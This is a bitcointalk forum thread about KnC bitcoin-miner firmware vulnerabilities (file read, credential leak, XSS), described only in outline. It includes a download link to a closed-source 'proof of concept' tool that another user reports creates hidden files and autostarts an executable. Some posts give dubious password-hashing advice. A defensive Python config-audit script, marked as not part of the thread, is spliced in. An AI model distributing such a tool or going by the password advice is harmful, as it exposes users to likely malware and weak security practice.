New features:

- Initial splash screen on first use now asks the user to specify a new administrator user name and password and also enter a list of trusted addresses allowed to manage the miner. (Please note that by entering trusted addresses incorrectly you could block your access to the miner. The only way to regain access would be to perform a hard reset by pressing the button on the front of the miner 5 times, waiting 5 seconds and pressing another 5 times, as described in the user manual)

There you go, just as i suggested it.

- Miner management can be configured to allow access for trusted addresses only. The trusted addresses should be specified by using space separated addresses from which the miner is allowed to be accessed via HTTP and SSH.

That's about time!!

- List of trusted management addresses can be changed on the "Network" page of the miner interface.

- On the "Mining" page there is now a setting which allows the user to specify which addresses can access the miner's API interface.

- Added support for BFGMiner, which is now selectable from the "Mining" page of the interface.

Thanks,
KnC team

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
padrino
Legendary
*
Offline Offline

Activity: 1428
Merit: 1000


https://www.bitworks.io


View Profile WWW
January 15, 2014, 05:38:22 PM
 #67

Since KnC does not even thank me for writing a detailed report, consuming several hours of my time, it's not worth it to me to write another one.
They DID implement every bugfix and security improvement I emailed them, and are now taking credit for it... Lame ass f*ckers!

If the script kiddies find out this new (ridiculous) bug in the miners, rest assured that many rigs will be taken over.


Sure they could have said something and should have, but are you sure it was in fact you and not someone else that emailed them before you but followed industry best practice and didn't make a post on a public forum with a lot of the technical details?

Of course this reply continues to destroy any credibility with respect to the massive amount of professional experience you say you have. As you continue this campaign I doubt more and more you were genuine to begin with and were at best a fame seeker, at worst malicious..

1CPi7VRihoF396gyYYcs2AdTEF8KQG2BCR
https://www.bitworks.io
arousedrhino
Sr. Member
****
Offline Offline

Activity: 347
Merit: 250


View Profile
January 16, 2014, 01:16:50 AM
 #68

KnC released a new firmware with all my points emailed to them taken into account.

THANK YOU KNC

However....

The new firmware has a HUGE security flaw. BUT...

Since KnC does not even thank me for writing a detailed report, consuming several hours of my time, it's not worth it to me to write another one.
They DID implement every bugfix and security improvement I emailed them, and are now taking credit for it... Lame ass f*ckers!

If the script kiddies find out this new (ridiculous) bug in the miners, rest assured that many rigs will be taken over.


Quote
We have a new firmware for you today, version 0.99.2 firmware which can be downloaded from our firmware page here: https://www.kncminer.com/pages/firmware The firmware contains the following changes.
New features:

- Initial splash screen on first use now asks the user to specify a new administrator user name and password and also enter a list of trusted addresses allowed to manage the miner. (Please note that by entering trusted addresses incorrectly you could block your access to the miner. The only way to regain access would be to perform a hard reset by pressing the button on the front of the miner 5 times, waiting 5 seconds and pressing another 5 times, as described in the user manual)

There you go, just as i suggested it.

- Miner management can be configured to allow access for trusted addresses only. The trusted addresses should be specified by using space separated addresses from which the miner is allowed to be accessed via HTTP and SSH.

That's about time!!

- List of trusted management addresses can be changed on the "Network" page of the miner interface.

- On the "Mining" page there is now a setting which allows the user to specify which addresses can access the miner's API interface.

- Added support for BFGMiner, which is now selectable from the "Mining" page of the interface.

Thanks,
KnC team


Steve,

Would this new bug you found be a problem for only public facing miners or all miners?

Just wondering if a miner on a private network with all the APIs turned off for cgminer would be vulnerable to such an attack.

Edit: Oh and I'm on .99.1-t.

Thanks.

KNC will never admit the security problem because that would legally make them potentially liable for losses suffered because of the breach. They could have at least sent ya 1 BTC or something for your effort. Time is money and if they don't want to pay you anything it's not worth your time.
bitpop
Legendary
*
Offline Offline

Activity: 2912
Merit: 1060



View Profile WWW
January 16, 2014, 01:18:14 AM
 #69

This guy is abrasive like I am

noext
Newbie
*
Offline Offline

Activity: 38
Merit: 0


View Profile
January 16, 2014, 11:29:14 AM
 #70

How do I bypass the HTTP digest? I want to try this hack on my KnC.
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 16, 2014, 03:48:45 PM
 #71

KnC released a new firmware with all my points emailed to them taken into account.

THANK YOU KNC

However....

The new firmware has a HUGE security flaw. BUT...

Since KnC does not even thank me for writing a detailed report, consuming several hours of my time, it's not worth it to me to write another one.
They DID implement every bugfix and security improvement I emailed them, and are now taking credit for it... Lame ass f*ckers!

If the script kiddies find out this new (ridiculous) bug in the miners, rest assured that many rigs will be taken over.


Quote
We have a new firmware for you today, version 0.99.2 firmware which can be downloaded from our firmware page here: https://www.kncminer.com/pages/firmware The firmware contains the following changes.
New features:

- Initial splash screen on first use now asks the user to specify a new administrator user name and password and also enter a list of trusted addresses allowed to manage the miner. (Please note that by entering trusted addresses incorrectly you could block your access to the miner. The only way to regain access would be to perform a hard reset by pressing the button on the front of the miner 5 times, waiting 5 seconds and pressing another 5 times, as described in the user manual)

There you go, just as i suggested it.

- Miner management can be configured to allow access for trusted addresses only. The trusted addresses should be specified by using space separated addresses from which the miner is allowed to be accessed via HTTP and SSH.

That's about time!!

- List of trusted management addresses can be changed on the "Network" page of the miner interface.

- On the "Mining" page there is now a setting which allows the user to specify which addresses can access the miner's API interface.

- Added support for BFGMiner, which is now selectable from the "Mining" page of the interface.

Thanks,
KnC team


Steve,

Would this new bug you found be a problem for only public facing miners or all miners?

Just wondering if a miner on a private network with all the APIs turned off for cgminer would be vulnerable to such an attack.

Edit: Oh and I'm on .99.1-t.

Thanks.

KNC will never admit the security problem because that would legally make them potentially liable for losses suffered because of the breach. They could have at least sent ya 1 BTC or something for your effort. Time is money and if they don't want to pay you anything it's not worth your time.

Well, without trying to reveal too much detail, the bugs in the newest firmware are major issues.

I found 3 critical exposures of user credentials in a very simple way.

1) This has something to do with a parameter that is not sanitized, making it possible to read protected files (user files?)
2) The user file is readable without logging in to the system web interface
3) Cross Site Scripting "prompt" methods can be executed

To answer your question, your miner itself will be well shielded from outside access. However, the biggest problem once again comes down to the user.
You may protect your miner with all available options, but what about your other hardware that is connected to your internet?

Almost every available router has at least one working exploit available out there on the internet. Piece of cake to login/hack/crack your router, and your miner is accessible.

The most recent problems are however using smart devices on the same network. For example, a smart TV, a WiFi printer, a NAS server, ....
Same here, almost all these devices have one or more security flaws. These are also known to be "less" secured by the user itself.

Once again, just by accessing these devices, your miner can be at risk.

Now, don't be a fool thinking your miner IP is unknown to the internet either. Even from behind a router, your end IP address gets submitted with every share on the internet....
There are many many huge lists available on the net with miner IP addresses. And then it's just a matter of scanning this specific network range for weak devices.

A very good solution comes from SickPig:

Quote
Never ever expose your miner directly to the internet.

Do not assign public IP to miner network interface. 

Even if you're using a private address for your miner do not trust your router fw/firewall.

Router firmwares are updated once in very long while, they reach support EOL quite rapidly. Taking this into account implies using your router port forwarding is moot. 

Use a bridge system between your router and your miner(s). Be it a linux hardened box or an OpenBSD one.

Set up a firewall on this machine that do both ingress/egress filtering. Set up a VPN service on this bridge box. Access to the miner only through this VPN service. 

If you do not have a static IP spend a few bucks a month for a VPS with a static IP address and use n2n (a layer two p2p VPN) (http://www.ntop.org/products/n2n/) to mimic a more classic VPN set up.

Keep your eyes open, and change the passwords of ALL devices in your network every now and then.
Don't be scared to use long passwords; for example, you can SHA-512 hash your current password.

Your basic password known as for example

"password"

then becomes

"b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86"

way more secure against bruteforce/dictionary hacking methods.

If you are not allowed this many characters, take a simple MD5 encryption of your current password.



The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
U1TRA_L0RD
Full Member
***
Offline Offline

Activity: 126
Merit: 100

CAUTION: Angry Man with Attitude.


View Profile
January 17, 2014, 06:44:54 AM
 #72

Maybe I'm not so sure about getting a Jupiter now, until this vulnerability gets fixed with a new firmware update.
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 18, 2014, 06:49:28 PM
 #73

Since KnC patched up, I'm going to compile my injection application and release it to the public.

However, some restrictions will apply for general safety!!

-- My application will be limited to ONLY scan your OWN subnet or IP range (127.0.x.x and 192.168.x.x).

-- This application will act as proof of concept, no changes to the miner itself can be made.

-- The newest firmware bug will spill out your <super secret> login without authentication

The reason i will release the application is for miners to test their own miners against the exploits in the firmware.

Stay tuned, I will compile all this into a nice running GUI by Sunday evening  Grin



NOTE: STOP asking me in PM about the full exploit in the new firmware. This will not be revealed !


The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
palawan
Sr. Member
****
Offline Offline

Activity: 386
Merit: 250


View Profile
January 19, 2014, 06:45:54 AM
 #74


I'm extremely addicted at looking at my Antminer S1 miner from anywhere, lol.  I have to be able to connect to it from anywhere.  I got a hotspot on my phone...

I still have the default root password of root on my S1, however:

  • 1. My ddwrt router can only be managed remotely from 1 IP address
  • 2. My Antminer S1 can only be managed by 1 IP address
  • 3. My Antminer S1 can only ssh'ed to by 1 IP address
  • 4. Ports 80, 443 or 22 are not the ports to connect to

Amazon EC2 micro instance for free (I think it's still free).  I have paid about $1/month for the past 3 months and it's only because I've exceeded the data transfer quota.  Set one up.  Install OpenVPN on it.  Install PPTP VPN on it (for tablets and cell phones).  This is your personal VPN server and you don't need to pay nobody  (pun intended).  You can use this when using unsecured public wifi.

Choose an Ubuntu instance. apt-get the necessary packages. Guides are out there. EC2 requires opening the necessary ports as well as on the Ubuntu hosts. If I somehow find the time and feel energetic I would write a detailed step-by-step and post it on a webpage, but I doubt it will be anytime soon...


halu
Acejam
Full Member
***
Offline Offline

Activity: 124
Merit: 251


View Profile
January 22, 2014, 06:55:50 AM
 #75

Since KnC patched up, I'm going to compile my injection application and release it to the public.

However, some restrictions will apply for general safety!!

-- My application will be limited to ONLY scan your OWN subnet or IP range (127.0.x.x and 192.168.x.x).

-- This application will act as proof of concept, no changes to the miner itself can be made.

-- The newest firmware bug will spill out your <super secret> login without authentication

The reason i will release the application is for miners to test their own miners against the exploits in the firmware.

Stay tuned, I will compile all this into a nice running GUI by Sunday evening  Grin



NOTE: STOP asking me in PM about the full exploit in the new firmware. This will not be revealed !



Needs to be open source. Otherwise you will be stealin our wallet dot dat's!

 Grin
Walking Glitch
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250

Amateur Professional


View Profile
January 22, 2014, 07:51:04 AM
 #76

You guys need to quit port forwarding/DMZing everything to the internet so blindly. One thing that would have completely prevented your kncminer from being a target is setting up a VPN on a computer inside your network, and forward only the necessary port to connect to it. Then using the VPN session, log into your miner. Then no matter what bug is in kncminers firmware, if it's not receiving inbound connections from the internet, it is unhackable. (Unless of course one of your own machines are compromised.)
ici_lemmy
Full Member
***
Offline Offline

Activity: 254
Merit: 100

Hydax Exchange


View Profile
January 22, 2014, 07:53:25 AM
 #77

Stay tuned, I will compile all this into a nice running GUI by Sunday evening  Grin
Sunday? You mean next Sunday?
bitpop
Legendary
*
Offline Offline

Activity: 2912
Merit: 1060



View Profile WWW
January 22, 2014, 08:13:36 AM
 #78

Yes awaiting Sunday

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 22, 2014, 09:46:04 AM
 #79

Hi all,

I'm sorry, but at the moment I have another priority task :-)
I will publish it later this week!!

About the open source demand, due to the nature of this application, of course, for general safety open source will be impossible.

There is no need for the entire world to be able to exploit mining rigs!

You will only be allowed to scan your own network ;-)

There will also be an option that scans your entire network for weak or exposed devices, showing whether there is a known exploit available or not, like your router etc.

Please stay tuned!

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
Walking Glitch
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250

Amateur Professional


View Profile
January 23, 2014, 02:56:14 AM
 #80

If you're not a script kiddie, you would be able to figure out how to trick his app into scanning everything. Keep that in mind when you release it steve.
arousedrhino
Sr. Member
****
Offline Offline

Activity: 347
Merit: 250


View Profile
January 23, 2014, 04:48:27 AM
 #81

Maybe I'm not so sure about getting a Jupiter now, until this vulnerability gets fixed with a new firmware update.

Where were you going to buy one from anyways?
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 23, 2014, 03:58:08 PM
 #82

If you're not a script kiddie, you would be able to figure out how to trick his app into scanning everything. Keep that in mind when you release it steve.

I had this issue on my mind already. I have only one option to prevent this from happening:

I obfuscate my code and crypt the executable, making the code non-reversible and undebuggable, thus preventing people from 'tricking' it and using it for evil purposes.

But here's the big "but" part:

When crypting an executable, 4/35 virus scanners will give me a false positive because of certain things, specifically the cgminer DLL and the encrypted source.
Yes, most of us know that cgminer itself is considered a 'trojan' by Bitdefender. (just download it and try yourself  Cheesy )

But I can not put a file up for download that gives a false positive AV alert out here; the entire forum will scream and shout that I'm a scammer or so.
Even if it is only 4/35 virus scanners giving false positives.

So, can I make my code so closed that abusing it becomes impossible?

Yes, but at the risk of being blamed and shamed as a scammer for putting up a (possible) false positive AV scan file.

So do I prefer to be named a scammer, or do I prefer to prevent massive scale abuse of the systems?

Maybe I'll just put it up as-is, warn about the false positives, and hope people trust me.
On the other hand, I think the chances of someone debugging or reverse engineering my application are way smaller than someone calling me a scammer.

So, we'll see !

nuno12345
Sr. Member
****
Offline Offline

Activity: 276
Merit: 284


View Profile
January 23, 2014, 10:00:13 PM
Last edit: January 24, 2014, 01:10:05 AM by nuno12345
 #83

People debugging your code will probably happen.
If the file itself is well encrypted and can't be debugged, you can probably still sniff the network traffic and see how it's working.

Also I don't like this closed-source, you-know-it-all or tipping-attempt thing, so here is what I have found based on your posts only, for everyone, not just KnC.

You said to scan the internet using some kind of tool; later a user posted some data from ShodanHQ (with ShodanHQ you can easily find those subnet addresses with dozens of miners), you said it was a bad tool, so you're probably speaking about zmap or masscan (scan the internet in 1 hour).

About the digest bypass, I'm not sure, but you gave some clues like XSS, so probably some new file (check new commits at GitHub) is vulnerable to something like this.

The cgminer vulnerability is not a vulnerability, since there is no security to break: port 4028 open in the router + api-listen + api-allow = the dumbest thing, since everyone can easily monitor your miners or even change pools with switchpool().


Having said this, sorry admin for the content of the reply; what I really want to talk about is how to fix it/patch it.

Instead of posting a PoC, why don't you post a fix, temporary fix, patch or whatever? Way more useful, and no one will call you a scammer Smiley
sssubito
Newbie
*
Offline Offline

Activity: 35
Merit: 0


View Profile
January 24, 2014, 09:48:46 AM
 #84

Posting the fix won't help much as this will reveal most of the vital details to be abused as an exploit.

The true shame is the completely unprofessional behavior of KnC. steve15 did invest some work; he uses Jupiters for his own mining. Even if someone else emailed details to KnC earlier than him, KnC should respond in a far more professional way than they did. They should take the opportunity to speak with steve15 and use his work and details for some well-invested refund in exchange for knowledge that KnC apparently lacks or doesn't care about.

I don't own KnC hardware, but if I were to own a single piece I would constantly shout and scream at KnC. So many companies don't give a shit about security and their customers, expose them in a way which is unbelievable, and KnC is just one of them. How lame is this!

OK, the customer too has a responsibility, sure. Mining isn't child's play; you should know exactly what you are doing and how you set up your gear. Seems like greed makes miners sooo blind.


@KnC: Act more responsibly and professionally, your customers deserve it!
Gator-hex
Hero Member
*****
Offline Offline

Activity: 490
Merit: 500


View Profile
January 24, 2014, 12:13:07 PM
 #85

Quote
PLEASE USE A ROUTER INSTEAD OF DIRECT INTERNET ACCESS !!!

Anyone who puts a mining machine on their WAN instead of their LAN will be hacked. Simple as.

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 24, 2014, 06:44:14 PM
 #86

You said to scan the internet using some kind of tool; later a user posted some data from ShodanHQ (with ShodanHQ you can easily find those subnet addresses with dozens of miners), you said it was a bad tool, so you're probably speaking about zmap or masscan (scan the internet in 1 hour).

zmap, masscan, or any other scanner just scans ports. I have a homemade tool that scans the entire net for "some" responses that expose every miner online (KnC, Ant, BFL, ....) in about 4 hours.

Since I made this post, not a single ShodanHQ-found miner is vulnerable any more. Job well done, I guess!
But then, Shodan is not a great tool or scanner. It just finds miners "by accident", not intentionally. It only has about 140 results; I get over 8000 results...

About the digest bypass, I'm not sure, but you gave some clues like XSS, so probably some new file (check new commits at GitHub) is vulnerable to something like this.

XSS has little to do with the latest exploit. I just stated that their new firmware is vulnerable to XSS exploits.

The cgminer vulnerability is not a vulnerability, since there is no security to break: port 4028 open in the router + api-listen + api-allow = the dumbest thing, since everyone can easily monitor your miners or even change pools with switchpool().

I agree. But that is KnC's default configuration, as it is for many, many, many online miners.

Having said this, sorry admin for the content of the reply; what I really want to talk about is how to fix it/patch it.

Instead of posting a PoC, why don't you post a fix, temporary fix, patch or whatever? Way more useful, and no one will call you a scammer Smiley

The 'fix' has been submitted to KnC together with my detailed report. I even wrote an entire new firmware for them. They took it, modified it for some reason, and published it online.
Because they modified it, it now has a critical exploit, spilling out the username + password without logging in first.

So, I patched up their FW, gave a temporary fix by posting this (shows in the Shodan results: before the post = 84 exploitable, now 0), and my PoC is far more than just a PoC.
It will also scan your entire network, hooked up to the Metasploit DB, to show your network's weak spots.

And if you don't like closed source, then don't download it. It's not about my safety, but the safety of an entire community.

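As an added example (not code from this thread, from steve15's tool, or from cgminer itself), here is a small Python audit of the cgminer/bfgminer API settings nuno12345 and steve15 are arguing about: it parses the api-allow list and flags a configuration that hands privileged (W:) access on port 4028 to non-local addresses, next to a hardened one that keeps W: on localhost and read-only monitoring on the LAN. It assumes cgminer's documented [G:]IP[/prefix] syntax with W = privileged and R = read-only, IPv4 entries only, that api-network without api-allow opens the listener to every address, and that an entry with no group should be audited as privileged; both sample configs are constructed.

```python
"""Audit a cgminer/bfgminer JSON config for an API exposed beyond localhost.

Added example for this thread, not cgminer's own code. Assumptions: api-allow
uses "[G:]IP[/prefix],..." with W = privileged (switchpool etc.) and R =
read-only; IPv4 only; api-network without api-allow listens on all addresses;
an entry without a group is treated as privileged (worst case for the owner).
"""
import ipaddress
import json

API_PORT = 4028  # cgminer/bfgminer default API port, as named in the thread

# Constructed sample config: API listening with a privileged entry for every
# address, the exposure nuno12345 describes (anyone reaching 4028 can switch pools).
WEAK_CONFIG = """{
  "pools": [{"url": "stratum+tcp://pool.example:3333", "user": "worker", "pass": "x"}],
  "api-listen": true,
  "api-allow": "W:0/0"
}"""

# Constructed hardened config: privileged access only from localhost,
# read-only monitoring from the LAN.
HARDENED_CONFIG = """{
  "pools": [{"url": "stratum+tcp://pool.example:3333", "user": "worker", "pass": "x"}],
  "api-listen": true,
  "api-allow": "W:127.0.0.1,R:192.168.1.0/24"
}"""


def _ipv4_network(spec):
    """Expand cgminer's abbreviated IPv4 forms ("0/0", "192.168.0/24") to a network."""
    addr, _, prefix = spec.partition("/")
    octets = addr.split(".")
    if len(octets) > 4 or not all(o.isdigit() for o in octets):
        raise ValueError("not an IPv4 spec: %r" % spec)
    octets += ["0"] * (4 - len(octets))  # "192.168.0" -> "192.168.0.0"
    return ipaddress.IPv4Network("%s/%s" % (".".join(octets), prefix or "32"), strict=False)


def parse_api_allow(allow):
    """Parse "[G:]IP[/prefix],..." into (group, network) pairs (IPv4 only)."""
    entries = []
    for item in allow.split(","):
        item = item.strip()
        if not item:
            continue
        group, _, spec = item.rpartition(":")
        # Assumption: no explicit group is audited as privileged.
        entries.append((group or "W", _ipv4_network(spec)))
    return entries


def audit_api_config(cfg):
    """Return (severity, message) findings for the API settings of a config dict."""
    findings = []
    if not cfg.get("api-listen", False):
        return findings  # API disabled: nothing answers on the port
    allow = cfg.get("api-allow")
    if allow is None:
        if cfg.get("api-network", False):
            findings.append(("high", "api-network is set without api-allow: port %d "
                             "answers on every interface" % API_PORT))
        return findings  # assumption: neither option means 127.0.0.1 only
    for group, net in parse_api_allow(allow):
        if net.is_loopback:
            continue  # localhost access is the intended default
        everyone = net.prefixlen == 0
        if group == "W":
            sev = "critical" if everyone else "high"
            findings.append((sev, "privileged (W) API access from %s: pools can be "
                             "switched by anyone reaching port %d" % (net, API_PORT)))
        elif everyone:
            findings.append(("medium", "read-only API access from anywhere: hashrate, "
                             "pool URLs and worker names visible to the whole internet"))
        else:
            findings.append(("info", "read-only API access from %s" % net))
    return findings


def is_exposed(config_text):
    """True if the JSON config grants more than localhost/LAN read-only access."""
    return any(sev in ("critical", "high", "medium")
               for sev, _ in audit_api_config(json.loads(config_text)))


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, "EXPOSED" if is_exposed(text) else "ok")
        for sev, msg in audit_api_config(json.loads(text)):
            print("  [%s] %s" % (sev, msg))
```

The audit only reads the miner's own config; a router forwarding port 4028 to the miner, the other half of the exposure described above, has to be checked on the router.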
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 24, 2014, 06:46:26 PM
 #87

Posting the fix won't help much as this will reveal most of the vital details to be abused as an exploit.

The true shame is the completely unprofessional behavior of KnC. steve15 did invest some work; he uses Jupiters for his own mining. Even if someone else emailed details to KnC earlier than him, KnC should respond in a far more professional way than they did. They should take the opportunity to speak with steve15 and use his work and details for some well-invested refund in exchange for knowledge that KnC apparently lacks or doesn't care about.

I don't own KnC hardware, but if I were to own a single piece I would constantly shout and scream at KnC. So many companies don't give a shit about security and their customers, expose them in a way which is unbelievable, and KnC is just one of them. How lame is this!

OK, the customer too has a responsibility, sure. Mining isn't child's play; you should know exactly what you are doing and how you set up your gear. Seems like greed makes miners sooo blind.


@KnC: Act more responsibly and professionally, your customers deserve it!

Thank you sir!

KnC used my custom firmware and released it as their own a couple of days after I submitted my work to them.
I don't need credit or so, but at least a 'thank you' would show some respect.

But the bitter truth is that most companies only care about your money.

sssubito
Newbie
*
Offline Offline

Activity: 35
Merit: 0


View Profile
January 24, 2014, 10:52:28 PM
 #88

KnC used my custom firmware and released it as their own a couple of days after I submitted my work to them.
I don't need credit or so, but at least a 'thank you' would show some respect.

But the bitter truth is that most companies only care about your money.
Now that's pretty badass from KnC. Lame money hogs...

There is one strong argument a customer always has: let your wallet speak out loud! Every company understands this well. Unfortunately it's only effective if used in some form of customer consensus, which is apparently the weak point. Being consistent is quite hard, especially when the market and competition are small.
padrino
Legendary
*
Offline Offline

Activity: 1428
Merit: 1000


https://www.bitworks.io


View Profile WWW
January 25, 2014, 04:36:54 AM
 #89

KnC used my custom firmware and released it as their own a couple of days after I submitted my work to them.
I don't need credit or so, but at least a 'thank you' would show some respect.

But the bitter truth is that most companies only care about your money.
Now that's pretty badass from KnC. Lame money hogs...

There is one strong argument a customer always has: let your wallet speak out loud! Every company understands this well. Unfortunately it's only effective if used in some form of customer consensus, which is apparently the weak point. Being consistent is quite hard, especially when the market and competition are small.

Way to get sucked into this.. steve15 may have done some good but this is the same guy telling everyone a "nobody" user was a sign the system was hacked.. Point being even the most basic security concepts were beyond him even though he is a claimed professional pen tester.

I initially gave credit as well but while his core point was quite valid and he did stumble onto a weakness in the system the demonstrated lack of understanding behind some key fundamentals puts many of the unsubstantiated claims to question given he stated over and over again he is a professional pen tester.

Now you are using unverified statement after unverified statement as a set of facts and jumping to conclusions which are completely unsubstantiated..

1CPi7VRihoF396gyYYcs2AdTEF8KQG2BCR
https://www.bitworks.io
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 25, 2014, 12:05:21 PM
 #90


Way to get sucked into this.. steve15 may have done some good but this is the same guy telling everyone a "nobody" user was a sign the system was hacked.. Point being even the most basic security concepts were beyond him even though he is a claimed professional pen tester.

I initially gave credit as well but while his core point was quite valid and he did stumble onto a weakness in the system the demonstrated lack of understanding behind some key fundamentals puts many of the unsubstantiated claims to question given he stated over and over again he is a professional pen tester.

Now you are using unverified statement after unverified statement as a set of facts and jumping to conclusions which are completely unsubstantiated..

I think you need to stop blaming me for getting 5 Th/s hacked, while I was driving, looking at my 4" cellphone screen through SSH at who was logged in at that exact moment, and in between that, posting details here on the forum...

So yes, I mistook the nobody user at that time.

ici_lemmy
Full Member
***
Offline Offline

Activity: 254
Merit: 100

Hydax Exchange


View Profile
January 25, 2014, 01:52:18 PM
 #91

I found 3 critical exposures of user credentials in a very simple way.

1) This has something to do with a parameter that is not sanitized, making you read protected files (userfiles?)
2) Userfile is readable without logging in to the system web interface
3) Cross Site Scripting "prompt" methods are able to be executed
So you found a 0day in lighttpd mod_auth? I don't think so...
I can be wrong, but considering your posts in this thread (password bruteforce, nobody user, your miner directly connected to WAN, etc.), until you post something that can prove what you are saying, I can't take you seriously!

zmap, masscan, or any other scanner just scans ports. I have a homemade tool that scans the entire net for "some" responses that expose every miner online (KnC, Ant, BFL, ....) in about 4 hours.
Again, I can be wrong, but the only shared thing I can think of is cgminer. It doesn't open a port for listening, so again, I can't take you seriously...


I'm sorry but, to my eyes, you are no longer credible...

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 25, 2014, 02:19:46 PM
 #92

I found 3 critical exposures of user credentials in a very simple way.

1) This has something to do with a parameter that is not sanitized, making you read protected files (userfiles?)
2) Userfile is readable without logging in to the system web interface
3) Cross Site Scripting "prompt" methods are able to be executed
So you found a 0day in lighttpd mod_auth? I don't think so...
I can be wrong, but considering your posts in this thread (password bruteforce, nobody user, your miner directly connected to WAN, etc.), until you post something that can prove what you are saying, I can't take you seriously!

zmap, masscan, or any other scanner just scans ports. I have a homemade tool that scans the entire net for "some" responses that expose every miner online (KnC, Ant, BFL, ....) in about 4 hours.
Again, I can be wrong, but the only shared thing I can think of is cgminer. It doesn't open a port for listening, so again, I can't take you seriously...


I'm sorry but, to my eyes, you are no longer credible...



Well, KnC DID upgrade their firmware, so I guess that proves enough to me.
I'm sorry, I cannot post more "proof" on a public forum. Unlike others, I do care about general security.

And yes, you are wrong about the scanning part.
And no, I did not find a 0day. It's already known, exploited and documented long before my post.

But then, once again, feel free to skip this thread.
I'm not posting this to have flamewars about who is right and who is wrong.
This behaviour is mostly the reason why I don't make any more efforts to patch up the new exploit.

I thought I could help the community, but this forum just seems to be a bunch of bashing kids.
Every topic someone posts, the entire forum screams "fake", "scammer", etc. Why is this?

Read for example the KnC intro topic. Same there. All fake and scam. Then why are you all still here....



Walking Glitch
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250

Amateur Professional


View Profile
January 25, 2014, 11:44:34 PM
 #93

I doubt steve trusts me with it, but if he wants someone to vet his exploit, I would do it. In fact, I already have a good idea of how exactly he did it, but I don't have a Jupiter/Mercury/Saturn/Neptune to try it on.
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 26, 2014, 01:09:41 PM
 #94

I doubt steve trusts me with it, but if he wants someone to vet his exploit, I would do it. In fact, I already have a good idea of how exactly he did it, but I don't have a Jupiter/Mercury/Saturn/Neptune to try it on.

At most, i can compile everything into some DLL files. That way you make the executable file yourself, and just call my API.

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 26, 2014, 06:43:22 PM
Last edit: January 27, 2014, 07:43:58 PM by steve15
 #95

I finished compiling my "Proof of Concept" application to allow you to test out the exploits on your OWN miners.

Just run the "minerProof.exe" file. It will scan your network, revealing all the devices on your LAN.
Each device will get its own node in the tree list. When expanding your device, it will show you all information, including all known exploits about it!

Once you get your miner (KnC will show up as server lighttpd), expand the list to "firmware". It will list the executed exploit result.

After finding all devices, the software will scan your network to identify if you are remotely vulnerable or not.
It will also give you solutions if a security risk has been found on your network.

This application has been tested with KnC Jupiter, AntMiners, cgminer and bfgminer, running on Windows 8.1 x64.

Application restrictions: ONLY your OWN subnet can be scanned! When network sniffing is detected, the application will auto shut down!

Antivirus results: Scanned with MetaScan, the file is clean with 39/40 antivirus scanners. I have one false positive out of 40 with a minor AV vendor.
The file is CLEAN!! If 39 of the biggest AV vendors show it's clean, it IS clean!

Note: The false positive is triggered by the sub that detects network sniffing and shuts the application down.

AV scan result: https://www.metascan-online.com/en/scanresult/file/d79999b0cbd74e978fc4dfee6d3bc0ef

If you don't trust the files, then simply don't download or run them.


If you find an exploit on your system, then please patch up using the solutions provided, and post your exploit in this topic to prove the concept of it!!

File download URL: https://mega.co.nz/#!FNIlSL5Q!5SVBuSNrXkT5ckXmdK7Fews0-avozcE8QcL4_acjHss | minerProofOfConcept.zip | 1.1Mb

If you have problems using the tool, please write me a PM, but dont spam this topic with questions about it.


JUST TO BE CLEAR

Decompiling the executable or the DLL file will NOT give you what you are looking for.
These are only there to run the network scan.

AutoIt is used to execute the actual exploit, and to detect modifications, scanners, sniffers, decompilers, and virtual boxes.

If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.

USE THIS TOOL FOR WHAT IT HAS BEEN DESIGNED FOR!!

This tool is a PROOF OF CONCEPT about built-in exploits in most miner hardware rigs.

If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, then your intentions are NOT to test your environment, thus the file gets destroyed.

I received a ton of PMs about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.



ici_lemmy
Full Member
***
Offline Offline

Activity: 254
Merit: 100

Hydax Exchange


View Profile
January 26, 2014, 08:34:46 PM
 #96

Ok, just a quick analysis... And I have a few questions...

Can you explain why you need to create a hidden directory in the user profile dir? (named "raklr")
Can you explain what the files in this directory are made for?
Can you explain why you need to autostart fg0ezkfEkds5.exe?

The tool didn't even start in my XP VM!

My quick conclusion: this is VERY suspicious...
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 26, 2014, 08:38:20 PM
 #97

Ok, just a quick analysis... And I have a few questions...

Can you explain why you need to create a hidden directory in the user profile dir? (named "raklr")
Can you explain what the files in this directory are made for?
Can you explain why you need to autostart fg0ezkfEkds5.exe?

The tool didn't even start in my XP VM!

My quick conclusion: this is VERY suspicious...


Yes I can explain. This will not even run in a VM.

AutoIt creates a local file for monitoring against network sniffers / other suspicious files running at the same time.
When detected, it kills the application.

As long as your antivirus/malware scanner/firewall does not go berserk, no need to worry ;-)

EDIT: XP?? You need .NET Framework 4 to run it...

ici_lemmy
Full Member
***
Offline Offline

Activity: 254
Merit: 100

Hydax Exchange


View Profile
January 27, 2014, 12:58:59 PM
 #98

I've played a little bit more with your tool...
I managed to remove your AutoIt exe from my XP VM, easily bypass it when launching your tool and finally run your tool. Shocked

So now I'm waiting for actual miners' opinions, but you've lost all credibility! Roll Eyes
